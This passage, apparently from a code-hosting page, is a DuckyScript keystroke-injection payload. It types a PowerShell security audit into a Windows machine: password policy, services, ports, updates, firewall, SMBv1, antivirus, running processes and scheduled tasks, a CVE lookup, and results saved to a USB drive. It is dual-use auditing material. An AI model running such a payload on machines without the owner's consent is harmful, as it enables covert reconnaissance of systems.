ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking open ports: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-missingupdates {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Checking Windows Update logs..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "WindowsUpdate.log written to $updateLogPath"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error getting Windows Update log: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-firewallstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netsh advfirewall show allprofiles
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking firewall status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-smbv1status {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-windowsoptionalfeature -online -featurename smb1protocol
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking SMBv1 status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-antivirusstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-mpcomputerstatus
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking antivirus status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-passwordpolicy >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING audit-services >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-networksettings >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-softwarevulnerabilities >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING analyze-logs >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-openports >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-missingupdates >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-firewallstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-smbv1status >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-antivirusstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Dynamically identify critical software from running processes and scheduled tasks
|
||||||
|
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Combine running software and scheduled tasks
|
||||||
|
STRING $softwareList = @()
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($process in $runningSoftware) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += $process.Name
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($task in $scheduledTasks) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Remove duplicates and empty entries
|
||||||
|
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Check CVEs for identified software
|
||||||
|
STRING foreach ($software in $softwareList) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($version) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-cve -productname $software -version $version >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Results saved to USB drive."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error: USB drive MYUSB not found."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING invoke-command -scriptblock $script
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 20000
|
Loading…
Reference in New Issue